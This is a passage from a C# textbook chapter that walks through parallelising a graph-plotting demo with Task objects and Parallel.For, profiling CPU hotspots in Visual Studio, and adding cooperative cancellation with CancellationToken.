Manager that the application is not making full use of the processing
resources available. On a dual-core machine, it is using just over half of the
CPU power, and on a quad-core machine, it is employing a little more than a
quarter of the CPU. This phenomenon occurs because the application is
single-threaded, and in a Windows application, a single thread can provide
work only to a single core on a multicore processor. To spread the load over
all the available cores, you need to divide the application into tasks and
arrange for each task to be executed by a separate thread, each running on a
different core. This is what you will do next.
Using Performance Explorer to identify CPU
bottlenecks
The GraphDemo application was specifically designed to create a CPU
bottleneck at a known point (in the generateGraphData method). In the
real world you might be aware that something is causing your
application to run slowly and become unresponsive, but you might not
know where the offending code is located. This is where the Visual
Studio Performance Explorer and Profiler can prove invaluable.
The Profiler can sample the run-time state of the application
periodically and capture information about which statement was
running at the time. The more frequently a particular line of code is
executed and the longer this line takes to run, the more frequently this
statement will be observed. The Profiler uses this data to generate a run-
time profile of the application and produce a report that details the
hotspots in your code. These hotspots can be useful in identifying areas
on which you should focus your optimizations. The following optional
steps walk you through this process.
Note Performance Explorer and the Profiler are not available in
Visual Studio 2017 Community Edition.
1. In Visual Studio, on the Debug menu, point to Profiler, point to
Performance Explorer, and then click New Performance Session.
The Performance Explorer window should appear in Visual Studio:
2. In Performance Explorer, right-click Targets and then click Add
Target Project. The GraphDemo application will be added as a
target.
3. In the Performance Explorer menu bar, click Actions, and then
click Start Profiling. The GraphDemo application starts running.
4. Click Plot Graph and wait for the graph to be generated. Repeat
this process several times, and then close the GraphDemo
application.
5. Return to Visual Studio and wait while the Profiler analyzes the
sampling data collected and generates a report that should look
similar to this:
This report shows the CPU utilization (which should be similar to
that which you observed using Task Manager earlier, with peaks
whenever you clicked Plot Graph), and the Hot Path for the
application. This path identifies the sequence through the
application that consumed the most processing. In this case, the
application spent 93.46 percent of the time in the plotButton_Click
method, 80.08 percent of the time was spent executing the
generateGraphData method, and 33.85 percent of the time was
spent in the plotXY method. A considerable amount of time (22.20
percent) was also consumed by the runtime (coreclr.dll).
Note that you can zoom in on particular areas of the CPU
utilization graph (click and drag using the mouse), and filter the
report to cover only the zoomed-in part of the sampled data.
6. In the Hot Path part of the report, click the
GraphDemo.MainPage.generateGraphData method. The Report
window displays the details of the method, together with the
proportion of the CPU time spent executing the most expensive
statements:
In this case, you can see that the code in the for loop should be
the primary target for any optimization effort.
Modify the GraphDemo application to use Task objects
1. Return to Visual Studio 2017, and display the MainPage.xaml.cs file in
the Code and Text Editor window, if it is not already open.
2. Examine the generateGraphData method.
The purpose of this method is to populate the items in the data array. It
iterates through the array by using the outer for loop based on the x loop
control variable, highlighted in bold here:
private void generateGraphData(byte[] data)
{
    double a = pixelWidth / 2;
    double b = a * a;
    double c = pixelHeight / 2;
    for (double x = 0; x < a; x++)
    {
        double s = x * x;
        double p = Math.Sqrt(b - s);
        for (double i = -p; i < p; i += 3)
        {
            double r = Math.Sqrt(s + i * i) / a;
            double q = (r - 1) * Math.Sin(24 * r);
            double y = i / 3 + (q * c);
            plotXY(data, (int)(-x + (pixelWidth / 2)), (int)(y + (pixelHeight / 2)));
            plotXY(data, (int)(x + (pixelWidth / 2)), (int)(y + (pixelHeight / 2)));
        }
    }
}
The calculation performed by one iteration of this loop is independent of
the calculations performed by the other iterations. Therefore, it makes
sense to partition the work performed by this loop and run different
iterations on separate processors.
3. Modify the definition of the generateGraphData method to take two
additional int parameters, called partitionStart and partitionEnd, as
shown in bold in the following example:
private void generateGraphData(byte[] data, int partitionStart,
    int partitionEnd)
{
    ...
}
4. In the generateGraphData method, change the outer for loop to iterate
between the values of partitionStart and partitionEnd, as shown here in
bold:
private void generateGraphData(byte[] data, int partitionStart,
    int partitionEnd)
{
    ...
    for (double x = partitionStart; x < partitionEnd; x++)
    {
        ...
    }
}
5. In the Code and Text Editor window, add the following using directive
to the list at the top of the MainPage.xaml.cs file:
using System.Threading.Tasks;
6. In the plotButton_Click method, comment out the statement that calls
the generateGraphData method and add the statement shown in bold in
the following code. This new statement creates a Task object and starts it
running:
...
Stopwatch watch = Stopwatch.StartNew();
// generateGraphData(data);
Task first = Task.Run(() => generateGraphData(data, 0, pixelWidth / 4));
...
The task runs the code specified by the lambda expression. The values
for the partitionStart and partitionEnd parameters indicate that the Task
object calculates the data for the first half of the graph. (The data for the
complete graph consists of points plotted for the values between 0 and
pixelWidth / 2.)
7. Add another statement that creates and runs a second Task object on
another thread, as shown in the following bold-highlighted code:
...
Task first = Task.Run(() => generateGraphData(data, 0, pixelWidth / 4));
Task second = Task.Run(() => generateGraphData(data, pixelWidth / 4, pixelWidth / 2));
...
This Task object invokes the generateGraphData method and calculates
the data for the values between pixelWidth / 4 and pixelWidth / 2.
8. Add the following statement shown in bold that waits for both Task
objects to complete their work before continuing:
...
Task second = Task.Run(() => generateGraphData(data, pixelWidth / 4, pixelWidth / 2));
Task.WaitAll(first, second);
...
9. On the Debug menu, click Start Without Debugging to build and run the
application. Adjust the display to ensure that you can see the Task
Manager window displaying the CPU utilization.
10. In the GraphDemo window, click Plot Graph. In the Task Manager
window, wait for the CPU utilization to level off.
11. Repeat step 10 several more times, waiting for the CPU utilization to
level off between clicks. Make a note of the duration recorded each time
you click the button, and then calculate the average.
You should see that the application runs significantly quicker than it did
previously. On my computer, the typical time dropped to 735
milliseconds—a reduction in time of approximately 40 percent.
In most cases, the time required to perform the calculations will be cut
by nearly half, but the application still has some single-threaded
elements, such as the logic that actually displays the graph after the data
has been generated. This is why the overall time is still more than half
the time taken by the previous version of the application.
12. Switch to the Task Manager window.
You should see that the application uses more CPU resources than
before. On my quad-core machine, the CPU usage peaked at
approximately 40 percent each time I clicked Plot Graph. This happens
because the two tasks were each run on separate cores, but the remaining
two cores were left unoccupied. If you have a dual-core machine, you
will likely see processor utilization briefly approach 80–90 percent each
time the graph is generated.
Note You should take the graph of CPU utilization in Task
Manager as a general guide only. The accuracy is determined by
the sampling rate of Windows. This means that if a CPU spends a
very short time with high usage, it might not always be reported; it
could fall between samples. This phenomenon also accounts for
why some peaks appear to be truncated plateaus rather than tall
points.
You should also notice that the time reported to generate the data by the
GraphDemo application drops considerably, to approximately 60
percent of that reported when it was running single-threaded.
13. Close the GraphDemo application and return to Visual Studio 2017.
Note If you have a quad-core computer, you can increase the CPU
utilization and reduce the time further by adding two more Task objects
and dividing the work into four chunks in the plotButton_Click method,
as shown here in bold:
...
Task first = Task.Run(() => generateGraphData(data, 0, pixelWidth / 8));
Task second = Task.Run(() => generateGraphData(data, pixelWidth / 8, pixelWidth / 4));
Task third = Task.Run(() => generateGraphData(data, pixelWidth / 4, pixelWidth * 3 / 8));
Task fourth = Task.Run(() => generateGraphData(data, pixelWidth * 3 / 8, pixelWidth / 2));
Task.WaitAll(first, second, third, fourth);
...
If you have only a dual-core processor, you can still try this
modification, and you should notice a small beneficial effect on the
time. This is primarily because of the way in which the algorithms used
by the CLR optimize the way in which the threads for each task are
scheduled.
Abstracting tasks by using the Parallel class
By using the Task class, you have complete control over the number of tasks
your application creates. However, you had to modify the design of the
application to accommodate the use of Task objects. You also had to add
code to synchronize operations; the application can render the graph only
when all the tasks have completed. In a complex application, the
synchronization of tasks can become a nontrivial process that is easily prone
to mistakes.
With the Parallel class, you can parallelize some common programming
constructs without having to redesign an application. Internally, the Parallel
class creates its own set of Task objects, and it synchronizes these tasks
automatically when they have completed. The Parallel class is located in the
System.Threading.Tasks namespace and provides a small set of static
methods that you can use to indicate that code should be run in parallel if
possible. These methods are as follows:
Parallel.For You can use this method in place of a C# for statement.
It defines a loop in which iterations can run in parallel by using tasks.
This method is heavily overloaded, but the general principle is the
same for each: you specify a start value, an end value, and a reference
to a method that takes an integer parameter. The method is executed for
every value between the start value and one below the end value
specified, and the parameter is populated with an integer that specifies
the current value. For example, consider the following simple for loop
that performs each iteration in sequence:
for (int x = 0; x < 100; x++)
{
    // Perform loop processing
}
Depending on the processing performed by the body of the loop, you
might be able to replace this loop with a Parallel.For construct that can
perform iterations in parallel, like this:
Parallel.For(0, 100, performLoopProcessing);
...
private void performLoopProcessing(int x)
{
    // Perform loop processing
}
Using the overloads of the Parallel.For method, you can provide local
data that is private to each thread, specify various options for creating
the tasks run by the For method, and create a ParallelLoopState object
that can be used to pass state information to other concurrent iterations
of the loop. (Using a ParallelLoopState object is described later in this
chapter.)
Parallel.ForEach<T> You can use this method in place of a C#
foreach statement. Like the For method, ForEach defines a loop in
which iterations can run in parallel. You specify a collection that
implements the IEnumerable<T> generic interface and a reference to a
method that takes a single parameter of type T. The method is executed
for each item in the collection, and the item is passed as the parameter
to the method. Overloads are available with which you can provide
private local thread data and specify options for creating the tasks run
by the ForEach method.
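(A short sketch of ForEach appears after this list.)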
Parallel.Invoke You can use this method to execute a set of
parameterless method calls as parallel tasks. You specify a list of
delegated method calls (or lambda expressions) that take no parameters
and do not return values. Each method call can be run on a separate
thread, in any order. For example, the following code makes a series of
method calls:
doWork();
doMoreWork();
doYetMoreWork();
You can replace these statements with the following code, which
invokes these methods by using a series of tasks:
Parallel.Invoke(
    doWork,
    doMoreWork,
    doYetMoreWork
);
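Here is the short sketch of Parallel.ForEach promised earlier. The customers list and the processCustomer method are hypothetical stand-ins for your own collection and per-item processing:

List<string> customers = new List<string> { "Alice", "Bob", "Carla" };
Parallel.ForEach(customers, customer => processCustomer(customer));
...
private void processCustomer(string customer)
{
    // Process a single item; iterations might run in parallel and in any order
}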
You should bear in mind that the Parallel class determines the actual
degree of parallelism appropriate for the environment and workload of the
computer. For example, if you use Parallel.For to implement a loop that
performs 1,000 iterations, the Parallel class does not necessarily create 1,000
concurrent tasks (unless you have an exceptionally powerful processor with
1,000 cores). Instead, the Parallel class creates what it considers to be the
optimal number of tasks that balances the available resources against the
requirement to keep the processors occupied. A single task might perform
multiple iterations, and the tasks coordinate with each other to determine
which iterations each task will perform. An important consequence of this is
that you cannot guarantee the order in which the iterations are executed, so
you must ensure that there are no dependencies between iterations; otherwise,
you might encounter unexpected results, as you will see later in this chapter.
In the next exercise, you will return to the original version of the
GraphDemo application and use the Parallel class to perform operations
concurrently.
Use the Parallel class to parallelize operations in the GraphDemo
application
1. Using Visual Studio 2017, open the GraphDemo solution, which is
located in the \Microsoft Press\VCSBS\Chapter 23\Parallel GraphDemo
folder in your Documents folder.
This is a copy of the original GraphDemo application. It does not use
tasks yet.
2. In Solution Explorer, in the GraphDemo project, expand the
MainPage.xaml node, and then double-click MainPage.xaml.cs to
display the code for the form in the Code and Text Editor window.
3. Add the following using directive to the list at the top of the file:
using System.Threading.Tasks;
4. Locate the generateGraphData method. It looks like this:
private void generateGraphData(byte[] data)
{
    double a = pixelWidth / 2;
    double b = a * a;
    double c = pixelHeight / 2;
    for (double x = 0; x < a; x++)
    {
        double s = x * x;
        double p = Math.Sqrt(b - s);
        for (double i = -p; i < p; i += 3)
        {
            double r = Math.Sqrt(s + i * i) / a;
            double q = (r - 1) * Math.Sin(24 * r);
            double y = i / 3 + (q * c);
            plotXY(data, (int)(-x + (pixelWidth / 2)), (int)(y + (pixelHeight / 2)));
            plotXY(data, (int)(x + (pixelWidth / 2)), (int)(y + (pixelHeight / 2)));
        }
    }
}
The outer for loop that iterates through values of the variable x is a
prime candidate for parallelization. You might also consider the inner
loop based on the variable i. However, if you have nested loops such as
those that occur in this code, it is good practice to parallelize the outer
loops first and then test to see whether the performance of the
application is sufficient. If it is not, work your way through nested loops
and parallelize them working from outer to inner loops, testing the
performance after modifying each one. You will find that in many cases
parallelizing outer loops has the most impact on performance, whereas
the effects of modifying inner loops become more marginal.
5. Cut the code in the body of the for loop, and create a new private void
method called calculateData with this code. The calculateData method
should take an int parameter called x, and a byte array called data. Also,
move the statements that declare the local variables a, b, and c from the
generateGraphData method to the start of the calculateData method.
The following code shows the generateGraphData method with this
code removed and the calculateData method (do not try to compile this
code yet):
private void generateGraphData(byte[] data)
{
    for (double x = 0; x < a; x++)
    {
    }
}

private void calculateData(int x, byte[] data)
{
    double a = pixelWidth / 2;
    double b = a * a;
    double c = pixelHeight / 2;
    double s = x * x;
    double p = Math.Sqrt(b - s);
    for (double i = -p; i < p; i += 3)
    {
        double r = Math.Sqrt(s + i * i) / a;
        double q = (r - 1) * Math.Sin(24 * r);
        double y = i / 3 + (q * c);
        plotXY(data, (int)(-x + (pixelWidth / 2)), (int)(y + (pixelHeight / 2)));
        plotXY(data, (int)(x + (pixelWidth / 2)), (int)(y + (pixelHeight / 2)));
    }
}
6. In the generateGraphData method, replace the for loop with the
following statement that calls the static Parallel.For method:
private void generateGraphData(byte[] data)
{
    Parallel.For(0, pixelWidth / 2, x => calculateData(x, data));
}
This code is the parallel equivalent of the original for loop. It iterates
through the values from 0 to pixelWidth / 2 – 1 inclusive. Each
invocation runs by using a task, and each task might run more than one
iteration. The Parallel.For method finishes only when all the tasks it has
created complete their work. Remember that the Parallel.For method
expects the final parameter to be a method that takes a single integer
parameter. It calls this method passing the current loop index as the
parameter. In this example, the calculateData method does not match
the required signature because it takes two parameters: an integer and a
byte array. For this reason, the code uses a lambda expression that acts
as an adapter that calls the calculateData method with the appropriate
arguments.
7. On the Debug menu, click Start Without Debugging to build and run the
application.
8. In the GraphDemo window, click Plot Graph. When the graph appears
in the GraphDemo window, record the time taken to generate the graph.
Repeat this action several times to get an average value.
You should notice that the application runs at least as quickly as the
previous version that used Task objects and possibly faster, depending
on the number of CPUs you have available. This is because the
Parallel.For construct automatically takes advantage of all the available
processors, so on a dual core machine, it will use two processor cores,
on a quad core it will use four processor cores, and so on. You don’t
have to amend your code in any way to scale between processor
architectures.
9. Close the GraphDemo application and return to Visual Studio.
When not to use the Parallel class
You should be aware that despite appearances and the best efforts of the
.NET Framework development team at Microsoft, the Parallel class is not
magic—you cannot use it without due consideration and just expect your
applications to suddenly run significantly faster and produce the same results.
The purpose of the Parallel class is to parallelize CPU-bound, independent
areas of your code.
If you are not running CPU-bound code, parallelizing it might not
improve performance. In this case, the overhead of creating a task, running
this task on a separate thread, and waiting for the task to complete is likely to
be greater than the cost of running this method directly. The additional
overhead might account for only a few milliseconds each time a method is
called, but you should bear in mind the number of times that a method runs.
If the method call is located in a nested loop and is executed thousands of
times, all of these small overhead costs will add up. The general rule is to use
Parallel.Invoke only when it is worthwhile. You should reserve
Parallel.Invoke for operations that are computationally intensive; otherwise,
the overhead of creating and managing tasks can actually slow down an
application.
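As a contrived sketch (doTrivialWork is a hypothetical method that does almost nothing), the following call will probably run more slowly than two direct method calls, because the cost of creating and scheduling the tasks exceeds the work they perform:

Parallel.Invoke(doTrivialWork, doTrivialWork); // task overhead dominates the trivial work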
The other key consideration for using the Parallel class is that parallel
operations should be independent. For example, if you attempt to use
Parallel.For to parallelize a loop in which iterations have a dependency on
each other, the results will be unpredictable.
To see what I mean, look at the following code (you can find this example
in the ParallelLoop solution, which is located in the \Microsoft
Press\VCSBS\Chapter 23\ParallelLoop folder in your Documents folder):
using System;
using System.Threading;
using System.Threading.Tasks;

namespace ParallelLoop
{
    class Program
    {
        private static int accumulator = 0;

        static void Main(string[] args)
        {
            for (int i = 0; i < 100; i++)
            {
                AddToAccumulator(i);
            }
            Console.WriteLine($"Accumulator is {accumulator}");
        }

        private static void AddToAccumulator(int data)
        {
            if ((accumulator % 2) == 0)
            {
                accumulator += data;
            }
            else
            {
                accumulator -= data;
            }
        }
    }
}
This program iterates through the values from 0 to 99 and calls the
AddToAccumulator method with each value in turn. The AddToAccumulator
method examines the current value of the accumulator variable and, if it is
even, adds the value of the parameter to the accumulator variable; otherwise,
it subtracts the value of the parameter. At the end of the program, the result is
displayed. If you run this program, the value output should be –100.
To increase the degree of parallelism in this simple application, you might
be tempted to replace the for loop in the Main method with Parallel.For, as
shown here in bold:
static void Main(string[] args)
{
    Parallel.For(0, 100, AddToAccumulator);
    Console.WriteLine($"Accumulator is {accumulator}");
}
However, there is no guarantee that the tasks created to run the various
invocations of the AddToAccumulator method will execute in any specific
sequence. (The code is also not thread-safe because multiple threads running
the tasks might attempt to modify the accumulator variable concurrently.)
The value calculated by the AddToAccumulator method depends on the
sequence being maintained, so the result of this modification is that the
application might now generate different values each time it runs. In this
simple case, you might not actually see any difference in the value calculated
because the AddToAccumulator method runs very quickly and the .NET
Framework might elect to run each invocation sequentially by using the same
thread. However, if you make the following change (shown in bold) to the
AddToAccumulator method, you will get different results:
private static void AddToAccumulator(int data)
{
    if ((accumulator % 2) == 0)
    {
        accumulator += data;
        Thread.Sleep(10); // wait for 10 milliseconds
    }
    else
    {
        accumulator -= data;
    }
}
The Thread.Sleep method simply causes the current thread to wait for the
specified period of time. This modification simulates the thread performing
additional processing, and it affects the way in which the Parallel class
schedules the tasks, which now run on different threads, resulting in a
different sequence that calculates a different value.
The general rule is to use Parallel.For and Parallel.ForEach only if you
can guarantee that each iteration of the loop is independent, and test your
code thoroughly. A similar consideration applies to Parallel.Invoke: use this
construct to make method calls only if they are independent and the
application does not depend on them being run in a particular sequence.
Canceling tasks and handling exceptions
A common requirement of applications that perform long-running operations
is the ability to stop those operations if necessary. However, you should not
simply abort a task, as this could leave the data in your application in an
indeterminate state. Instead, the Task class implements a cooperative
cancellation strategy. Cooperative cancellation enables a task to select a
convenient point at which to stop processing and also enables it to undo any
work it has performed prior to cancellation if necessary.
The mechanics of cooperative cancellation
Cooperative cancellation is based on the notion of a cancellation token. A
cancellation token is a structure that represents a request to cancel one or
more tasks. The method that a task runs should include a
System.Threading.CancellationToken parameter. An application that wants to
cancel the task sets the Boolean IsCancellationRequested property of this
parameter to true. The method running in the task can query this property at
various points during its processing. If this property is set to true at any point,
it knows that the application has requested that the task be canceled. Also, the
method knows what work it has done so far, so it can undo any changes if
necessary and then finish. Alternatively, the method can simply ignore the
request and continue running.
Tip You should examine the cancellation token in a task frequently, but
not so frequently that you adversely impact the performance of the task.
If possible, you should aim to check for cancellation at least every ten
milliseconds, but no more frequently than every millisecond.
An application obtains a CancellationToken by creating a
System.Threading.CancellationTokenSource object and querying the Token
property of this object. The application can then pass this CancellationToken
object as a parameter to any methods started by tasks that the application
creates and runs. If the application needs to cancel the tasks, it calls the
Cancel method of the CancellationTokenSource object. This method sets the
IsCancellationRequested property of the CancellationToken passed to all the
tasks.
The code example that follows shows how to create a cancellation token
and use it to cancel a task. The initiateTasks method instantiates the
cancellationTokenSource variable and obtains a reference to the
CancellationToken object available through this variable. The code then
creates and runs a task that executes the doWork method. Later on, the code
calls the Cancel method of the cancellation token source, which sets the
cancellation token. The doWork method queries the IsCancellationRequested
property of the cancellation token. If the property is set, the method
terminates; otherwise, it continues running.
public class MyApplication
{
    ...
    // Method that creates and manages a task
    private void initiateTasks()
    {
        // Create the cancellation token source and obtain a cancellation token
        CancellationTokenSource cancellationTokenSource = new CancellationTokenSource();
        CancellationToken cancellationToken = cancellationTokenSource.Token;

        // Create a task and start it running the doWork method
        Task myTask = Task.Run(() => doWork(cancellationToken));
        ...
        if (...)
        {
            // Cancel the task
            cancellationTokenSource.Cancel();
        }
        ...
    }

    // Method run by the task
    private void doWork(CancellationToken token)
    {
        ...
        // If the application has set the cancellation token, finish processing
        if (token.IsCancellationRequested)
        {
            // Tidy up and finish
            ...
            return;
        }
        // If the task has not been canceled, continue running as normal
        ...
    }
}
In addition to providing a high degree of control over the cancellation
processing, this approach is scalable across any number of tasks; you can
start multiple tasks and pass the same CancellationToken object to each of
them. If you call Cancel on the CancellationTokenSource object, each task
will check whether the IsCancellationRequested property has been set and
proceed accordingly.
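A minimal sketch of this pattern, reusing the doWork method from the previous example, might look like this:

CancellationTokenSource cancellationTokenSource = new CancellationTokenSource();
CancellationToken cancellationToken = cancellationTokenSource.Token;
Task first = Task.Run(() => doWork(cancellationToken));
Task second = Task.Run(() => doWork(cancellationToken));
...
cancellationTokenSource.Cancel(); // a single call requests cancellation of both tasks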
You can also register a callback method (in the form of an Action
delegate) with the cancellation token by using the Register method. When an
application invokes the Cancel method of the corresponding
CancellationTokenSource object, this callback runs. However, you cannot
guarantee when this method executes; it might be before or after the tasks
have performed their own cancellation processing, or even during that
process.
...
cancellationToken.Register(doAdditionalWork);
...
private void doAdditionalWork()
{
    // Perform additional cancellation processing
}
In the next exercise, you will add cancellation functionality to the
GraphDemo application.
Add cancellation functionality to the GraphDemo application
1. Using Visual Studio 2017, open the GraphDemo solution, which is
located in the \Microsoft Press\VCSBS\Chapter 23\GraphDemo With
Cancellation folder in your Documents folder.
This is a completed copy of the GraphDemo application from the earlier
exercise that uses tasks to improve processing throughput. The user
interface also includes a button named cancelButton that the user can
use to stop the tasks that calculate the data for the graph.
2. In Solution Explorer, in the GraphDemo project, double-click
MainPage.xaml to display the form in the Design View window. Note
the Cancel button that appears in the left pane of the form.
3. Open the MainPage.xaml.cs file in the Code and Text Editor window.
Locate the cancelButton_Click method.
This method runs when the user clicks Cancel. It is currently empty.
4. Add the following using directive to the list at the top of the file:
using System.Threading;
The types used by cooperative cancellation reside in this namespace.
5. Add a CancellationTokenSource field called tokenSource to the
MainPage class, and initialize it to null, as shown in the following code
in bold:
public sealed partial class MainPage : Page
{
    ...
    private byte redValue, greenValue, blueValue;
    private CancellationTokenSource tokenSource = null;
    ...
}
6. Find the generateGraphData method and add a CancellationToken
parameter called token to the method definition, as shown here in bold:
private void generateGraphData(byte[] data, int partitionStart,
    int partitionEnd, CancellationToken token)
{
    ...
}
7. In the generateGraphData method, at the start of the inner for loop, add
the following code shown in bold to check whether cancellation has
been requested. If so, return from the method; otherwise, continue
calculating values and plotting the graph.
private void generateGraphData(byte[] data, int partitionStart,
    int partitionEnd, CancellationToken token)
{
    double a = pixelWidth / 2;
    double b = a * a;
    double c = pixelHeight / 2;
    for (double x = partitionStart; x < partitionEnd; x++)
    {
        double s = x * x;
        double p = Math.Sqrt(b - s);
        for (double i = -p; i < p; i += 3)
        {
            if (token.IsCancellationRequested)
            {
                return;
            }
            double r = Math.Sqrt(s + i * i) / a;
            double q = (r - 1) * Math.Sin(24 * r);
            double y = i / 3 + (q * c);
            plotXY(data, (int)(-x + (pixelWidth / 2)), (int)(y + (pixelHeight / 2)));
            plotXY(data, (int)(x + (pixelWidth / 2)), (int)(y + (pixelHeight / 2)));
        }
    }
}
8. In the plotButton_Click method, add the following statements shown in
bold that instantiate the tokenSource variable and retrieve the
CancellationToken object into a variable called token:
private void plotButton_Click(object sender, RoutedEventArgs e)
{
    Random rand = new Random();
    redValue = (byte)rand.Next(0xFF);
    greenValue = (byte)rand.Next(0xFF);
    blueValue = (byte)rand.Next(0xFF);
    tokenSource = new CancellationTokenSource();
    CancellationToken token = tokenSource.Token;
    ...
}
9. Modify the statements in the plotButton_Click method that create and
run the two tasks, and pass the token variable as the final parameter to
the generateGraphData method as shown in bold:
...
Task first = Task.Run(() => generateGraphData(data, 0, pixelWidth / 4, token));
Task second = Task.Run(() => generateGraphData(data, pixelWidth / 4, pixelWidth / 2, token));
...
10. Edit the definition of the plotButton_Click method and add the async
modifier as shown in bold here:
private async void plotButton_Click(object sender, RoutedEventArgs e)
{
    ...
}
11. In the body of the plotButton_Click method, comment out the
Task.WaitAll statement that waits for the tasks to complete and replace it
with the following statements in bold that use the await operator instead.
...
// Task.WaitAll(first, second);
await first;
await second;
duration.Text = ...;
...
The changes in these two steps are necessary because of the single-
threaded nature of the Windows user interface. Under normal
circumstances, when an event handler for a user interface component
such as a button starts running, event handlers for other user interface
components are blocked until the first event handler completes (even if
the event handler is using tasks). In this example, using the Task.WaitAll
method to wait for the tasks to complete would render the Cancel button
useless because the event handler for the Cancel button will not run until
the handler for the Plot Graph button completes, in which case there is
no point in attempting to cancel the operation. In fact, as mentioned
earlier, when you click the Plot Graph button, the user interface is
completely unresponsive until the graph appears and the
plotButton_Click method finishes.
The await operator is designed to handle situations such as this. You can
use this operator only inside a method marked as async. Its purpose is to
release the current thread and wait for a task to complete in the
background. When that task finishes, control returns to the method,
which continues with the next statement. In this example, the two await
statements simply allow each of the tasks to complete in the
background. After the second task has finished, the method continues,
displaying the time taken for these tasks to complete in the duration
TextBlock. Note that it is not an error to await for a task that has already
completed; the await operator will simply return immediately and pass
control to the following statement.
More Info
Chapter 24 discusses the async modifier and the await operator in
detail.
12. Find the cancelButton_Click method. Add the code shown here in bold
to this method:
private void cancelButton_Click(object sender, RoutedEventArgs e)
{
    if (tokenSource != null)
    {
        tokenSource.Cancel();
    }
}
This code checks that the tokenSource variable has been instantiated. If
it has, the code invokes the Cancel method on this variable.
13. On the Debug menu, click Start Without Debugging to build and run the
application.
14. In the GraphDemo window, click Plot Graph, and verify that the graph
appears as it did before. However, you should notice that it takes slightly
longer to generate the graph than before. This is because of the
additional check performed by the generateGraphData method.
15. Click Plot Graph again, and then quickly click Cancel.
If you are swift and click Cancel before the data for the graph is
generated, this action causes the methods being run by the tasks to
return. The data is not complete, so the graph appears with “holes,” as
shown in the following figure; the size of the holes depends on how
quickly you clicked Cancel.
16. Close the GraphDemo application and return to Visual Studio.
You can determine whether a task completed or was canceled by
examining the Status property of the Task object. The Status property
contains a value from the System.Threading.Tasks.TaskStatus enumeration.
The following list describes some of the status values that you might
commonly encounter (there are others):
Created This is the initial state of a task. It has been created but has not
yet been scheduled to run.
WaitingToRun The task has been scheduled but has not yet started to
run.
Running The task is currently being executed by a thread.
RanToCompletion The task completed successfully without any
unhandled exceptions.
Canceled The task was canceled before it could start running, or it
acknowledged cancellation and completed without throwing an
exception.
Faulted The task terminated because of an exception.
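For example, assuming a Task variable named task from the earlier examples, you can examine the outcome like this (a minimal sketch):

if (task.Status == TaskStatus.Canceled)
{
    // The task acknowledged cancellation and completed without throwing an exception
}
else if (task.Status == TaskStatus.Faulted)
{
    // The task terminated because of an unhandled exception
}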
In the next exercise, you will attempt to report the status of each task so
that you can see when they have completed or have been canceled.
Canceling a Parallel For or ForEach loop
The Parallel.For and Parallel.ForEach methods don’t provide you with
direct access to the Task objects that have been created. Indeed, you
don’t even know how many tasks are running—the .NET Framework
uses its own heuristics to work out the optimal number to use based on
the resources available and the current workload of the computer.
If you want to stop the Parallel.For or Parallel.ForEach method
early, you must use a ParallelLoopState object. The method you
specify as the body of the loop must include an additional
ParallelLoopState parameter. The Parallel class creates a
ParallelLoopState object and passes it as this parameter into the
method. The Parallel class uses this object to hold information about
each method invocation. The method can call the Stop method of this
object to indicate that the Parallel class should not attempt to perform
any iterations beyond those that have already started and finished. The
example that follows shows the Parallel.For method calling the
doLoopWork method for each iteration. The doLoopWork method
examines the iteration variable; if it is greater than 600, the method calls
the Stop method of the ParallelLoopState parameter. This causes the
Parallel.For method to stop running further iterations of the loop.
(Iterations currently running might continue to completion.)
Note Remember that the iterations in a Parallel.For loop are not
run in a specific sequence. Consequently, canceling the loop when
the iteration variable has the value 600 does not guarantee that the
previous 599 iterations have already run. Likewise, some
iterations with values greater than 600 might already have
completed.
Parallel.For(0, 1000, doLoopWork);
...
private void doLoopWork(int i, ParallelLoopState p)
{
    ...
    if (i > 600)
    {
        p.Stop();
    }
}
Display the status of each task
1. In Visual Studio, display the MainPage.xaml file in the Design View
window. In the XAML pane, add the following markup to the definition
of the MainPage form before the final </Grid> tag, as shown in the
following in bold:
<Image x:Name="graphImage" Grid.Column="1" Stretch="Fill" />
</Grid>
<TextBlock x:Name="messages" Grid.Row="4" FontSize="18" HorizontalAlignment="Left"/>
</Grid>
</Page>
This markup adds a TextBlock control named messages to the bottom of
the form.
2. Display the MainPage.xaml.cs file in the Code and Text Editor window
and find the plotButton_Click method.
3. Add the code shown below in bold to this method. These statements
generate a string that contains the status of each task after it has finished
running and then display this string in the messages TextBlock control at
the bottom of the form.
private async void plotButton_Click(object sender, RoutedEventArgs e)
{
    ...
    await first;
    await second;
    duration.Text = $"Duration (ms): {watch.ElapsedMilliseconds}";
    string message = $"Status of tasks is {first.Status}, {second.Status}";
    messages.Text = message;
    ...
}
4. On the Debug menu, click Start Without Debugging.
5. In the GraphDemo window, click Plot Graph but do not click Cancel.
Verify that the message displayed reports that the status of the tasks is
RanToCompletion (two times).
6. In the GraphDemo window, click Plot Graph again, and then quickly
click Cancel.
Surprisingly, the message that appears still reports the status of each task
as RanToCompletion, even though the graph appears with holes.
This behavior occurs because although you sent a cancellation request to
each task by using the cancellation token, the methods they were
running simply returned. The .NET Framework runtime does not know
whether the tasks were actually canceled or whether they were allowed
to run to completion, and it simply ignored the cancellation requests.
7. Close the GraphDemo application and return to Visual Studio.
So, how do you indicate that a task has been canceled rather than allowed
to run to completion? The answer lies in the CancellationToken object passed
as a parameter to the method that the task is running. The CancellationToken
class provides a method called ThrowIfCancellationRequested. This method
tests the IsCancellationRequested property of a cancellation token; if it is
true, the method throws an OperationCanceledException exception and
aborts the method that the task is running.
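Conceptually, a call to ThrowIfCancellationRequested behaves much like the following sketch, although in practice you should call the built-in method rather than writing this test yourself:

if (token.IsCancellationRequested)
{
    throw new OperationCanceledException(token); // aborts the method running in the task
}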
The application that started the thread should be prepared to catch and
handle this exception, but this leads to another question. If a task terminates
by throwing an exception, it actually reverts to the Faulted state. This is true
even if the exception is an OperationCanceledException exception. A task
enters the Canceled state only if it is canceled without throwing an exception.
So, how does a task throw an OperationCanceledException without it being
treated as an exception?
This time, the answer lies in the task itself. For a task to recognize that an
OperationCanceledException exception is the result of canceling the task in a
controlled manner and not just an exception caused by other circumstances, it
has to know that the operation has actually been canceled. It can do this only
if it can examine the cancellation token. You passed this token as a parameter
to the method run by the task, but the task does not actually check any of
these parameters. Instead, you specify the cancellation token when you create
and run the task. The code that follows shows an example based on the
GraphDemo application. Notice how the token parameter is passed to the
generateGraphData method (as before) but also as a separate parameter to
the Run method.
tokenSource = new CancellationTokenSource();
CancellationToken token = tokenSource.Token;
...
Task first = Task.Run(() => generateGraphData(data, 0, pixelWidth / 4, token), token);
Now, when the method being run by the task throws an
OperationCanceledException exception, the infrastructure behind the task
examines the CancellationToken. If it indicates that the task has been
